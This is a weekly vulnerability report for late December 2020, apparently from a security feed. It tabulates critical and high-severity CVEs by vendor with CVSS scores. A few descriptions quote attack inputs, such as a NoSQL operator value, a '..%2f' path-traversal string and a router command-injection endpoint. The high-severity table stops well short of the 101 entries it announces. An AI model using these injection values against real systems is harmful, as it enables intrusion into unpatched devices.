Weekly Vulnerabilities Reports > December 21 to 27, 2020
Overview
234 new vulnerabilities were reported during this period, including 44 critical and 101 high-severity vulnerabilities. This weekly summary reports vulnerabilities in 280 products from 124 vendors, including F5, Odoo, IBM, ABB, and Terra Master. The most common weakness categories are "Cross-site Scripting", "SQL Injection", "OS Command Injection", "Path Traversal", and "Resource Exhaustion".
- 204 reported vulnerabilities are remotely exploitable.
- 32 reported vulnerabilities have a public exploit available.
- 95 reported vulnerabilities are related to weaknesses in the OWASP Top Ten.
- 157 reported vulnerabilities are exploitable by an anonymous user.
- F5 has the most reported vulnerabilities, with 16.
- ABB has the most reported critical vulnerabilities, with 4.
Vulnerability Details
The following tables list the reported vulnerabilities for the period covered by this report, grouped by severity:
44 Critical Vulnerabilities
DATE | CVE | VENDOR | VULNERABILITY | CVSS |
---|---|---|---|---|
2020-12-24 | CVE-2020-26282 | Browserup | Unspecified vulnerability in Browserup Proxy BrowserUp Proxy allows you to manipulate HTTP requests and responses, capture HTTP content, and export performance data as a HAR file. | 10.0 |
2020-12-27 | CVE-2020-35729 | Klogserver | OS Command Injection vulnerability in Klogserver Klog Server 2.4.1 KLog Server 2.4.1 allows OS command injection via shell metacharacters in the user parameter of actions/authenticate.php. | 9.8 |
2020-12-27 | CVE-2020-7845 | Jiransecurity | Out-of-bounds Write vulnerability in Jiransecurity Spamsniper 5.0.2/5.7.5 Spamsniper 5.0 through 5.2.7 contains a stack-based buffer overflow caused by improper boundary checks when parsing the MAIL FROM command. | 9.8 |
2020-12-26 | CVE-2020-35245 | Flamingo Project | SQL Injection vulnerability in Flamingo Project Flamingo 20200929 Flamingo (aka FlamingoIM) through 2020-09-29 has a SQL injection vulnerability in UserManager::addUser. | 9.8 |
2020-12-26 | CVE-2020-35244 | Flamingo Project | SQL Injection vulnerability in Flamingo Project Flamingo 20200929 Flamingo (aka FlamingoIM) through 2020-09-29 has a SQL injection vulnerability in UserManager::addGroup. | 9.8 |
2020-12-26 | CVE-2020-35243 | Flamingo Project | SQL Injection vulnerability in Flamingo Project Flamingo 20200929 Flamingo (aka FlamingoIM) through 2020-09-29 has a SQL injection vulnerability in UserManager::updateUserInfoInDb. | 9.8 |
2020-12-26 | CVE-2020-35242 | Flamingo Project | SQL Injection vulnerability in Flamingo Project Flamingo 20200929 Flamingo (aka FlamingoIM) through 2020-09-29 has a SQL injection vulnerability in UserManager::updateUserTeamInfoInDbAndMemory. | 9.8 |
2020-12-26 | CVE-2020-29203 | Struct2Json Project | Classic Buffer Overflow vulnerability in Struct2Json Project Struct2Json struct2json before 2020-11-18 is affected by a Buffer Overflow because strcpy is used for S2J_STRUCT_GET_string_ELEMENT. | 9.8 |
2020-12-26 | CVE-2020-35364 | Huorong | Unspecified vulnerability in Huorong Internet Security 5.0.55.2 Beijing Huorong Internet Security 5.0.55.2 allows a non-admin user to escalate privileges by injecting code into a process, and then waiting for a Huorong services restart or a system reboot. | 9.8 |
2020-12-26 | CVE-2020-35575 | TP Link | Unspecified vulnerability in Tp-Link products A password-disclosure issue in the web interface on certain TP-Link devices allows a remote attacker to get full administrative access to the web panel. | 9.8 |
2020-12-26 | CVE-2020-35713 | Linksys | OS Command Injection vulnerability in Linksys Re6500 Firmware Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. | 9.8 |
2020-12-26 | CVE-2020-35712 | Esri | Server-Side Request Forgery (SSRF) vulnerability in Esri Arcgis Server Esri ArcGIS Server before 10.8 is vulnerable to SSRF in some configurations. | 9.8 |
2020-12-24 | CVE-2020-29474 | Egavilanmedia | SQL Injection vulnerability in Egavilanmedia EGM Address Book 1.0 EGavilan Media EGM Address Book 1.0 contains a SQL injection vulnerability. | 9.8 |
2020-12-24 | CVE-2020-29472 | Egavilanmedia | SQL Injection vulnerability in Egavilanmedia Under Construction Page With Cpanel 1.0 EGavilan Media Under Construction page with cPanel 1.0 contains a SQL injection vulnerability. | 9.8 |
2020-12-24 | CVE-2020-28188 | Terra Master | OS Command Injection vulnerability in Terra-Master TOS A Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to inject OS commands via the Event parameter of /include/makecvs.php. | 9.8 |
2020-12-24 | CVE-2020-28187 | Terra Master | Path Traversal vulnerability in Terra-Master TOS Multiple directory traversal vulnerabilities in TerraMaster TOS <= 4.2.06 allow remote authenticated attackers to read, edit or delete any file within the filesystem via (1) the filename parameter to /tos/index.php?editor/fileGet, (2) the Event parameter to /include/ajax/logtable.php, or (3) the opt parameter to /include/core/index.php. | 9.8 |
2020-12-23 | CVE-2020-35665 | Terra Master | OS Command Injection vulnerability in Terra-Master Terramaster Operating System 3.0.33/3.1.03/4.2.06 An unauthenticated command-execution vulnerability exists in TerraMaster TOS through 4.2.06 via shell metacharacters in the Event parameter in include/makecvs.php during CSV creation. | 9.8 |
2020-12-23 | CVE-2020-28074 | Online Health Care System Project | SQL Injection vulnerability in Online Health Care System Project Online Health Care System 1.0 SourceCodester Online Health Care System 1.0 is affected by SQL Injection which allows a potential attacker to bypass the authentication system and become an admin. | 9.8 |
2020-12-23 | CVE-2020-28073 | Library Management System Project | SQL Injection vulnerability in Library Management System Project Library Management System 1.0 SourceCodester Library Management System 1.0 is affected by SQL Injection allowing an attacker to bypass the user authentication and impersonate any user on the system. | 9.8 |
2020-12-23 | CVE-2020-28070 | Alumni Management System Project | SQL Injection vulnerability in Alumni Management System Project Alumni Management System 1.0 SourceCodester Alumni Management System 1.0 is affected by SQL injection causing arbitrary remote code execution from GET input in view_event.php via the 'id' parameter. | 9.8 |
2020-12-23 | CVE-2020-13968 | CRK | SQL Injection vulnerability in CRK Business Platform 2019.1 CRK Business Platform <= 2019.1 allows SQL statements to be injected against the database on any path via the 'strSessao' parameter. | 9.8 |
2020-12-23 | CVE-2020-29552 | Urve | OS Command Injection vulnerability in Urve 24.03.2020 An issue was discovered in URVE Build 24.03.2020. | 9.8 |
2020-12-23 | CVE-2020-11720 | Bilanc | Use of Hard-coded Credentials vulnerability in Bilanc 01431.01.2020 An issue was discovered in Programi Bilanc build 007 release 014 31.01.2020 and possibly below. | 9.8 |
2020-12-23 | CVE-2020-25196 | Moxa | Improper Restriction of Excessive Authentication Attempts vulnerability in Moxa Nport Iaw5000A-I/O Firmware The built-in WEB server for MOXA NPort IAW5000A-I/O firmware version 2.1 or lower allows SSH/Telnet sessions, which may be vulnerable to brute force attacks to bypass authentication. | 9.8 |
2020-12-23 | CVE-2020-25190 | Moxa | Cleartext Transmission of Sensitive Information vulnerability in Moxa Nport Iaw5000A-I/O Firmware The built-in WEB server for MOXA NPort IAW5000A-I/O firmware version 2.1 or lower stores and transmits the credentials of third-party services in cleartext. | 9.8 |
2020-12-22 | CVE-2020-29583 | Zyxel | Insufficiently Protected Credentials vulnerability in Zyxel products Firmware version 4.60 of Zyxel USG devices contains an undocumented account (zyfwp) with an unchangeable password. | 9.8 |
2020-12-22 | CVE-2020-25066 | Treck | Out-of-bounds Write vulnerability in Treck Tcp/Ip A heap-based buffer overflow in the Treck HTTP Server component before 6.0.1.68 allows remote attackers to cause a denial of service (crash/reset) or to possibly execute arbitrary code. | 9.8 |
2020-12-22 | CVE-2020-24683 | ABB | Incorrect Resource Transfer Between Spheres vulnerability in ABB Symphony + Historian and Symphony + Operations The affected versions of S+ Operations (version 2.1 SP1 and earlier) used an approach for user authentication which relies on validation at the client node (client-side authentication). | 9.8 |
2020-12-22 | CVE-2020-24679 | ABB | Improper Input Validation vulnerability in ABB Symphony + Historian and Symphony + Operations A S+ Operations and S+ Historian service is subject to a DoS by special crafted messages. | 9.8 |
2020-12-22 | CVE-2020-24675 | ABB | Improper Authentication vulnerability in ABB Symphony + Historian and Symphony + Operations In S+ Operations and S+ History, it is possible that an unauthenticated user could inject values to the Operations History server (or standalone S+ History server) and ultimately write values to the controlled process. | 9.8 |
2020-12-22 | CVE-2020-24673 | ABB | SQL Injection vulnerability in ABB Symphony + Historian and Symphony + Operations In S+ Operations and S+ Historian, a successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. | 9.8 |
2020-12-22 | CVE-2020-28448 | Multi INI Project | Unspecified vulnerability in Multi-Ini Project Multi-Ini This affects the package multi-ini before 2.1.1. | 9.8 |
2020-12-21 | CVE-2020-8995 | Bilanc | Use of Hard-coded Credentials vulnerability in Bilanc 01431.01.2020 Programi Bilanc Build 007 Release 014 31.01.2020 supplies a .exe file containing several hardcoded credentials to different servers that allow remote attackers to gain access to the complete infrastructure including the website, update server, and external issue tracking tools. | 9.8 |
2020-12-21 | CVE-2020-11717 | Bilanc | SQL Injection vulnerability in Bilanc 01431.01.2020 An issue was discovered in Programi 014 31.01.2020. | 9.8 |
2020-12-21 | CVE-2020-35605 | Kitty Project Debian | The Graphics Protocol feature in graphics.c in kitty before 0.19.3 allows remote attackers to execute arbitrary code because a filename containing special characters can be included in an error message. | 9.8 |
2020-12-21 | CVE-2020-35604 | Kronos | XXE vulnerability in Kronos web Time and Attendance 5.0.4 An XXE attack can occur in Kronos WebTA 5.0.4 when SAML is used. | 9.8 |
2020-12-21 | CVE-2020-21378 | Seacms | SQL Injection vulnerability in Seacms 10.1 SQL injection vulnerability in SeaCMS 10.1 (2020.02.08) via the id parameter in an edit action to admin_members_group.php. | 9.8 |
2020-12-21 | CVE-2020-21377 | Yunyecms | SQL Injection vulnerability in Yunyecms 2.0.1 SQL injection vulnerability in yunyecms V2.0.1 via the selcart parameter. | 9.8 |
2020-12-21 | CVE-2020-4988 | IBM | Unspecified vulnerability in IBM Loopback 8.0.0 Loopback 8.0.0 contains a vulnerability that could allow an attacker to manipulate or pollute Javascript values and cause a denial of service or possibly execute code. | 9.8 |
2020-12-21 | CVE-2020-27846 | Grafana Saml Project Redhat Fedoraproject | A signature verification vulnerability exists in crewjam/saml. | 9.8 |
2020-12-21 | CVE-2020-35276 | Egavilanmedia | SQL Injection vulnerability in Egavilanmedia ECM Address Book 1.0 EgavilanMedia ECM Address Book 1.0 is affected by SQL injection. | 9.8 |
2020-12-21 | CVE-2020-35590 | Limitloginattempts | Improper Restriction of Excessive Authentication Attempts vulnerability in Limitloginattempts Limit Login Attempts Reloaded LimitLoginAttempts.php in the limit-login-attempts-reloaded plugin before 2.17.4 for WordPress allows a bypass of (per IP address) rate limits because the X-Forwarded-For header can be forged. | 9.8 |
2020-12-23 | CVE-2020-29551 | Urve | Missing Authentication for Critical Function vulnerability in Urve 24.03.2020 An issue was discovered in URVE Build 24.03.2020. | 9.1 |
2020-12-22 | CVE-2018-15632 | Odoo | Improper Input Validation vulnerability in Odoo Improper input validation in database creation logic in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier, allows remote attackers to initialize an empty database on which they can connect with default credentials. | 9.1 |
101 High Vulnerabilities
DATE | CVE | VENDOR | VULNERABILITY | CVSS |
---|---|---|---|---|
2020-12-26 | CVE-2020-26766 | User Registration Login AND User Management System With Admin Panel Project | Cross-Site Request Forgery (CSRF) vulnerability in User Registration & Login and User Management System With Admin Panel Project User Registration & Login and User Management System With Admin Panel 2.1 A Cross Site Request Forgery (CSRF) vulnerability exists in the loginsystem page in PHPGurukul User Registration & Login and User Management System With Admin Panel 2.1. | 8.8 |
2020-12-26 | CVE-2020-25917 | Stratodesk | Missing Authorization vulnerability in Stratodesk Notouch Center 4.1.24 Stratodesk NoTouch Center before 4.4.68 is affected by: Incorrect Access Control. | 8.8 |
2020-12-26 | CVE-2020-35715 | Linksys | OS Command Injection vulnerability in Linksys Re6500 Firmware Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote authenticated users to execute arbitrary commands via shell metacharacters in a filename to the upload_settings.cgi page. | 8.8 |
2020-12-26 | CVE-2020-35714 | Linksys | OS Command Injection vulnerability in Linksys Re6500 Firmware Belkin LINKSYS RE6500 devices before 1.0.11.001 allow remote authenticated users to execute arbitrary commands via goform/systemCommand?command= in conjunction with the goform/pingstart program. | 8.8 |
2020-12-24 | CVE-2020-35693 | Google | Unspecified vulnerability in Google Android On some Samsung phones and tablets running Android through 7.1.1, it is possible for an attacker-controlled Bluetooth Low Energy (BLE) device to pair silently with a vulnerable target device, without any user interaction, when the target device's Bluetooth is on, and it is running an app that offers a connectable BLE advertisement. | 8.8 |
2020-12-23 | CVE-2020-35666 | Steedos | SQL Injection vulnerability in Steedos Steedos Platform through 1.21.24 allows NoSQL injection because the /api/collection/findone implementation in server/packages/steedos_base.js mishandles req.body validation, as demonstrated by MongoDB operator attacks such as an X-User-Id[$ne]=1 value. | 8.8 |
2020-12-23 | CVE-2020-35370 | Raysync | Path Traversal vulnerability in Raysync An RCE vulnerability exists in Raysync below 3.3.3.8. | 8.8 |
2020-12-23 | CVE-2020-35269 | Nagios | Cross-Site Request Forgery (CSRF) vulnerability in Nagios Core 4.2.4 Nagios Core application version 4.2.4 is vulnerable to site-wide Cross-Site Request Forgery (CSRF) in many functions, such as adding or deleting hosts or servers. | 8.8 |
2020-12-23 | CVE-2020-27397 | Projectworlds | Unrestricted Upload of File with Dangerous Type vulnerability in Projectworlds Online Matrimonial Project 1.0 Marital - Online Matrimonial Project In PHP version 1.0 suffers from an authenticated file upload vulnerability allowing remote attackers to gain remote code execution (RCE) on the Hosting web server via uploading a maliciously crafted PHP file. | 8.8 |
2020-12-23 | CVE-2020-25198 | Moxa | Session Fixation vulnerability in Moxa Nport Iaw5000A-I/O Firmware The built-in WEB server for MOXA NPort IAW5000A-I/O firmware version 2.1 or lower has incorrectly implemented protections from session fixation, which may allow an attacker to gain access to a session and hijack it by stealing the user’s cookies. | 8.8 |
2020-12-23 | CVE-2020-25194 | Moxa | Improper Privilege Management vulnerability in Moxa Nport Iaw5000A-I/O Firmware The built-in WEB server for MOXA NPort IAW5000A-I/O firmware version 2.1 or lower has improper privilege management, which may allow an attacker with user privileges to perform requests with administrative privileges. | 8.8 |
2020-12-22 | CVE-2020-24678 | ABB | Unspecified vulnerability in ABB Symphony + Historian and Symphony + Operations An authenticated user might execute malicious code under the user context and take control of the system. | 8.8 |
2020-12-22 | CVE-2020-24677 | ABB | Improper Check for Unusual or Exceptional Conditions vulnerability in ABB Symphony + Historian and Symphony + Operations Vulnerabilities in the S+ Operations and S+ Historian web applications can lead to a possible code execution and privilege escalation, redirect the user somewhere else or download unwanted data. | 8.8 |
2020-12-22 | CVE-2020-24674 | ABB | Incorrect Authorization vulnerability in ABB Symphony + Historian and Symphony + Operations In S+ Operations and S+ Historian, not all client commands correctly check user permission as expected. | 8.8 |
2020-12-22 | CVE-2020-14231 | Hcltechsw | Out-of-bounds Write vulnerability in Hcltechsw HCL Client Application Access 9.0 A vulnerability in the input parameter handling of HCL Client Application Access v9 could potentially be exploited by an authenticated attacker resulting in a stack buffer overflow. | 8.8 |
2020-12-22 | CVE-2020-24579 | Dlink | Improper Authentication vulnerability in Dlink Dsl2888A Firmware An issue was discovered on D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55. | 8.8 |
2020-12-22 | CVE-2020-13547 | Foxitsoftware | Type Confusion vulnerability in Foxitsoftware Foxit Reader 10.0.0.37527 A type confusion vulnerability exists in the JavaScript engine of Foxit Software’s Foxit PDF Reader, version 10.1.0.37527. | 8.8 |
2020-12-22 | CVE-2020-13570 | Foxitsoftware | Use After Free vulnerability in Foxitsoftware Foxit Reader 10.1.0.37527 A use-after-free vulnerability exists in the JavaScript engine of Foxit Software’s PDF Reader, version 10.1.0.37527. | 8.8 |
2020-12-22 | CVE-2020-13560 | Foxitsoftware | Use After Free vulnerability in Foxitsoftware Foxit Reader 10.1.0.37527 A use after free vulnerability exists in the JavaScript engine of Foxit Software’s Foxit PDF Reader, version 10.1.0.37527. | 8.8 |
2020-12-22 | CVE-2020-13557 | Foxitsoftware | Use After Free vulnerability in Foxitsoftware Foxit Reader 10.1.0.37527 A use after free vulnerability exists in the JavaScript engine of Foxit Software’s Foxit PDF Reader, version 10.1.0.37527. | 8.8 |
2020-12-22 | CVE-2020-29396 | Odoo | Unspecified vulnerability in Odoo 11.0/12.0/13.0 A sandboxing issue in Odoo Community 11.0 through 13.0 and Odoo Enterprise 11.0 through 13.0, when running with Python 3.6 or later, allows remote authenticated users to execute arbitrary code, leading to privilege escalation. | 8.8 |
2020-12-22 | CVE-2019-11781 | Odoo | Improper Input Validation vulnerability in Odoo Improper input validation in portal component in Odoo Community 12.0 and earlier and Odoo Enterprise 12.0 and earlier, allows remote attackers to trick victims into modifying their account via crafted links, leading to privilege escalation. | 8.8 |
2020-12-21 | CVE-2020-35626 | Mediawiki | Cross-Site Request Forgery (CSRF) vulnerability in Mediawiki An issue was discovered in the PushToWatch extension for MediaWiki through 1.35.1. | 8.8 |
2020-12-21 | CVE-2020-35625 | Mediawiki | Missing Authorization vulnerability in Mediawiki An issue was discovered in the Widgets extension for MediaWiki through 1.35.1. | 8.8 |
2020-12-21 | CVE-2020-35151 | Phpgurukul | SQL Injection vulnerability in PHPgurukul Online Marriage Registration System 1.0 The "searchdata" POST parameter of user/search.php in Online Marriage Registration System 1.0 is vulnerable to time-based SQL injection. | 8.8 |
2020-12-21 | CVE-2020-35606 | Webmin | OS Command Injection vulnerability in Webmin Arbitrary command execution can occur in Webmin through 1.962. | 8.8 |
2020-12-21 | CVE-2020-26284 | Gohugo | OS Command Injection vulnerability in Gohugo Hugo Hugo is a fast and Flexible Static Site Generator built in Go. | 8.5 |
2020-12-27 | CVE-2020-35728 | Fasterxml Debian Netapp Oracle | Deserialization of Untrusted Data vulnerability in multiple products FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool (aka embedded Xalan in org.glassfish.web/javax.servlet.jsp.jstl). | 8.1 |
2020-12-24 | CVE-2020-29189 | Terra Master | Unspecified vulnerability in Terra-Master TOS Incorrect Access Control vulnerability in TerraMaster TOS <= 4.2.06 allows remote authenticated attackers to bypass read-only restriction and obtain full access to any folder within the NAS | 8.1 |
2020-12-22 | CVE-2020-28460 | Multi INI Project | Unspecified vulnerability in Multi-Ini Project Multi-Ini This affects the package multi-ini before 2.1.2. | 8.1 |
2020-12-22 | CVE-2020-24581 | Dlink | OS Command Injection vulnerability in Dlink Dsl2888A Firmware An issue was discovered on D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55. | 8.0 |
2020-12-21 | CVE-2020-35273 | Egavilanmedia | Cross-Site Request Forgery (CSRF) vulnerability in Egavilanmedia User Registration & Login System With Admin Panel 1.0 EgavilanMedia User Registration & Login System with Admin Panel 1.0 is affected by Cross Site Request Forgery (CSRF) to remotely gain privileges in the User Profile panel. | 8.0 |
2020-12-27 | CVE-2020-8290 | Backblaze | Improper Privilege Management vulnerability in Backblaze Backblaze for Windows and Backblaze for macOS before 7.0.0.439 suffer from improper privilege management in `bztransmit` helper due to lack of permission handling and validation before creation of client update directories allowing for local escalation of privilege via rogue client update binary. | 7.8 |
2020-12-27 | CVE-2020-8289 | Backblaze | Improper Certificate Validation vulnerability in Backblaze 7.0.0.439 Backblaze for Windows before 7.0.1.433 and Backblaze for macOS before 7.0.1.434 suffer from improper certificate validation in `bztransmit` helper due to hardcoded whitelist of strings in URLs where validation is disabled leading to possible remote code execution via client update functionality. | 7.8 |
2020-12-25 | CVE-2020-35702 | Freedesktop | Out-of-bounds Write vulnerability in Freedesktop Poppler 20.12.1 DCTStream::getChars in DCTStream.cc in Poppler 20.12.1 has a heap-based buffer overflow via a crafted PDF document. | 7.8 |
2020-12-24 | CVE-2020-24658 | ARM | Allocation of Resources Without Limits or Throttling vulnerability in ARM Compiler Arm Compiler 5 through 5.06u6 has an error in a stack protection feature designed to help spot stack-based buffer overflows in local arrays. | 7.8 |
2020-12-24 | CVE-2020-9200 | Huawei | Improper Neutralization of Formula Elements in a CSV File vulnerability in Huawei Imanager Neteco 6000 V600R021C00 There is a CSV injection vulnerability in iManager NetEco 6000 version V600R021C00. | 7.8 |
2020-12-24 | CVE-2020-5681 | Epson | Uncontrolled Search Path Element vulnerability in Epson products Untrusted search path vulnerability in self-extracting files created by EpsonNet SetupManager versions 2.2.14 and earlier, and Offirio SynergyWare PrintDirector versions 1.6x/1.6y and earlier allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory. | 7.8 |
2020-12-22 | CVE-2020-24676 | ABB | Unspecified vulnerability in ABB Symphony + Historian and Symphony + Operations In Symphony Plus Operations and Symphony Plus Historian, some services can be vulnerable to privilege escalation attacks. | 7.8 |
2020-12-22 | CVE-2020-35608 | Microsoft | Injection vulnerability in Microsoft Azure Sphere 20.07 A code execution vulnerability exists in the normal world’s signed code execution functionality of Microsoft Azure Sphere 20.07. | 7.8 |
2020-12-22 | CVE-2020-25106 | Supremocontrol | Improper Privilege Management vulnerability in Supremocontrol Supremo 4.1.3.2348 Nanosystems SupRemo 4.1.3.2348 allows attackers to obtain LocalSystem access because File Manager can be used to rename Supremo.exe and then upload a Trojan horse with the Supremo.exe filename. | 7.8 |
2020-12-21 | CVE-2020-17526 | Apache | Unspecified vulnerability in Apache Airflow Incorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A. | 7.7 |
2020-12-27 | CVE-2020-35736 | Liftoffsoftware | Path Traversal vulnerability in Liftoffsoftware Gateone 1.1 GateOne 1.1 allows arbitrary file download without authentication via /downloads/.. | 7.5 |
2020-12-26 | CVE-2020-35362 | Dext5 | Path Traversal vulnerability in Dext5 Dext5Upload 2.7.1262310 DEXT5Upload 2.7.1262310 and earlier is affected by Directory Traversal in handler/dext5handler.jsp. | 7.5 |
2020-12-26 | CVE-2020-35284 | Flamingoim Project | Path Traversal vulnerability in Flamingoim Project Flamingoim 20200929 Flamingo (aka FlamingoIM) through 2020-09-29 allows ../ directory traversal because the only ostensibly unpredictable part of a file-transfer request is an MD5 computation; however, this computation occurs on the client side, and the computation details can be easily determined because the product's source code is available. | 7.5 |
2020-12-26 | CVE-2020-35450 | Gobby Project | NULL Pointer Dereference vulnerability in Gobby Project Gobby 0.4.11 Gobby 0.4.11 allows a NULL pointer dereference in the D-Bus handler for certain set_language calls. | 7.5 |
2020-12-26 | CVE-2020-35359 | Pureftpd | Allocation of Resources Without Limits or Throttling vulnerability in Pureftpd Pure-Ftpd 1.0.48 Pure-FTPd 1.0.48 allows remote attackers to prevent legitimate server use by making enough connections to exceed the connection limit. | 7.5 |
2020-12-26 | CVE-2020-35376 | Xpdfreader Fedoraproject | Out-of-bounds Write vulnerability in multiple products Xpdf 4.02 allows stack consumption because of an incorrect subroutine reference in a Type 1C font charstring, related to the FoFiType1C::getOp() function. | 7.5 |
2020-12-26 | CVE-2020-35388 | Rockoa | Unspecified vulnerability in Rockoa Xinhu 2.1.9 rainrocka xinhu 2.1.9 allows remote attackers to obtain sensitive information via an index.php?a=gettotal request in which the ajaxbool value is manipulated to be true. | 7.5 |
2020-12-26 | CVE-2020-35716 | Linksys | Unspecified vulnerability in Linksys Re6500 Firmware Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to cause a persistent denial of service (segmentation fault) via a long /goform/langSwitch langSelectionOnly parameter. | 7.5 |
2020-12-25 | CVE-2020-35711 | ARC Swap Project | Unspecified vulnerability in Arc-Swap Project Arc-Swap An issue has been discovered in the arc-swap crate before 0.4.8 (and 1.x before 1.1.0) for Rust. | 7.5 |
2020-12-24 | CVE-2020-11093 | Linuxfoundation | Unspecified vulnerability in Linuxfoundation Indy-Node Hyperledger Indy Node is the server portion of a distributed ledger purpose-built for decentralized identity. | 7.5 |
2020-12-24 | CVE-2020-9120 | Huawei | Unspecified vulnerability in Huawei Cloudengine 1800V V100R019C10Spc500 CloudEngine 1800V versions V100R019C10SPC500 has a resource management error vulnerability. | 7.5 |
2020-12-24 | CVE-2020-35680 | Opensmtpd Fedoraproject | NULL Pointer Dereference vulnerability in multiple products smtpd/lka_filter.c in OpenSMTPD before 6.8.0p1, in certain configurations, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a crafted pattern of client activity, because the filter state machine does not properly maintain the I/O channel between the SMTP engine and the filters layer. | 7.5 |
2020-12-24 | CVE-2020-35679 | Opensmtpd Fedoraproject | Memory Leak vulnerability in multiple products smtpd/table.c in OpenSMTPD before 6.8.0p1 lacks a certain regfree, which might allow attackers to trigger a "very significant" memory leak via messages to an instance that performs many regex lookups. | 7.5 |
2020-12-24 | CVE-2020-27728 | F5 | Unspecified vulnerability in F5 products On BIG-IP ASM & Advanced WAF versions 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, and 14.1.0-14.1.3, under certain conditions, Analytics, Visibility, and Reporting daemon (AVRD) may generate a core file and restart on the BIG-IP system when processing requests sent from mobile devices. | 7.5 |
2020-12-24 | CVE-2020-27723 | F5 | Unspecified vulnerability in F5 Big-Ip Access Policy Manager In versions 14.1.0-14.1.3 and 13.1.0-13.1.3.4, a BIG-IP APM virtual server processing PingAccess requests may lead to a restart of the Traffic Management Microkernel (TMM) process. | 7.5 |
2020-12-24 | CVE-2020-27720 | F5 | Unspecified vulnerability in F5 Big-Ip Local Traffic Manager On BIG-IP LTM/CGNAT version 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, 14.1.0-14.1.3, and 13.1.0-13.1.3.5, when processing NAT66 traffic with Port Block Allocation (PBA) mode and SP-DAG enabled, and dag-ipv6-prefix-len configured with a value less than the default of 128, an undisclosed traffic pattern may cause the Traffic Management Microkernel (TMM) to restart. | 7.5 |
2020-12-24 | CVE-2020-27717 | F5 | Unspecified vulnerability in F5 Big-Ip Domain Name System On BIG-IP DNS 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, 14.1.0-14.1.3, 13.1.0-13.1.3.4, and 12.1.0-12.1.5.2, undisclosed series of DNS requests may cause TMM to restart and generate a core file. | 7.5 |
2020-12-24 | CVE-2020-27716 | F5 | Unspecified vulnerability in F5 Big-Ip Access Policy Manager On versions 15.1.0-15.1.0.5, 14.1.0-14.1.3, 13.1.0-13.1.3.5, 12.1.0-12.1.5.2, and 11.6.1-11.6.5.2, when a BIG-IP APM virtual server processes traffic of an undisclosed nature, the Traffic Management Microkernel (TMM) stops responding and restarts. | 7.5 |
2020-12-24 | CVE-2020-27715 | F5 | Unspecified vulnerability in F5 products On BIG-IP 15.1.0-15.1.0.5 and 14.1.0-14.1.3, crafted TLS request to the BIG-IP management interface via port 443 can cause high (~100%) CPU utilization by the httpd daemon. | 7.5 |
2020-12-24 | CVE-2020-27714 | F5 | Unspecified vulnerability in F5 Big-Ip Advanced Firewall Manager On the BIG-IP AFM version 15.1.0-15.1.0.5, 14.1.0-14.1.3, and 13.1.0-13.1.3.5, when a Protocol Inspection Profile is attached to a FastL4 virtual server with the protocol field configured to either Other or All Protocols, the TMM may experience a restart if the profile processes non-TCP traffic. | 7.5 |
2020-12-24 | CVE-2020-27721 | F5 | Unspecified vulnerability in F5 products In versions 16.0.0-16.0.0.1, 15.1.0-15.1.1, 14.1.0-14.1.3, 13.1.0-13.1.3.5, 12.1.0-12.1.5.2, and 11.6.1-11.6.5.2, in a BIG-IP DNS / BIG-IP LTM GSLB deployment, under certain circumstances, the BIG-IP DNS system may stop using a BIG-IP LTM virtual server for DNS response. | 7.5 |
2020-12-24 | CVE-2020-27718 | F5 | Unspecified vulnerability in F5 products When a BIG-IP ASM or Advanced WAF system running version 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, 14.1.0-14.1.3, 13.1.0-13.1.3.4, 12.1.0-12.1.5.2, or 11.6.1-11.6.5.2 processes requests with JSON payload, an unusually large number of parameters can cause excessive CPU usage in the BIG-IP ASM bd process. | 7.5 |
2020-12-24 | CVE-2020-2504 | Qnap | Path Traversal vulnerability in Qnap QES If exploited, this absolute path traversal vulnerability could allow attackers to traverse files in File Station. | 7.5 |
2020-12-23 | CVE-2020-35668 | Redislabs | NULL Pointer Dereference vulnerability in Redislabs Redisgraph RedisGraph 2.x through 2.2.11 has a NULL Pointer Dereference that leads to a server crash because it mishandles an unquoted string, such as an alias that has not yet been introduced. | 7.5 |
2020-12-23 | CVE-2020-35598 | Advanced Comment System Project | Path Traversal vulnerability in Advanced Comment System Project Advanced Comment System 1.0 ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI. | 7.5 |
2020-12-23 | CVE-2020-11719 | Bilanc | Use of Hard-coded Credentials vulnerability in Bilanc 01431.01.2020 An issue was discovered in Programi Bilanc build 007 release 014 31.01.2020 and possibly below. | 7.5 |
2020-12-23 | CVE-2018-1000893 | Bitcoinsv | Resource Exhaustion vulnerability in Bitcoinsv Bitcoin SV Bitcoin SV before 0.1.1 allows uncontrolled resource consumption when deserializing transactions. | 7.5 |
2020-12-23 | CVE-2018-1000892 | Bitcoinsv | Resource Exhaustion vulnerability in Bitcoinsv Bitcoin SV Bitcoin SV before 0.1.1 allows uncontrolled resource consumption when receiving sendheaders messages. | 7.5 |
2020-12-23 | CVE-2018-1000891 | Bitcoinsv | Resource Exhaustion vulnerability in Bitcoinsv Bitcoin SV Bitcoin SV before 0.1.1 allows uncontrolled resource consumption when receiving messages with invalid checksums. | 7.5 |
2020-12-23 | CVE-2020-35587 | Mersive | Unspecified vulnerability in Mersive Solstice Firmware In Solstice Pod before 3.0.3, the firmware can easily be decompiled/disassembled. | 7.5 |
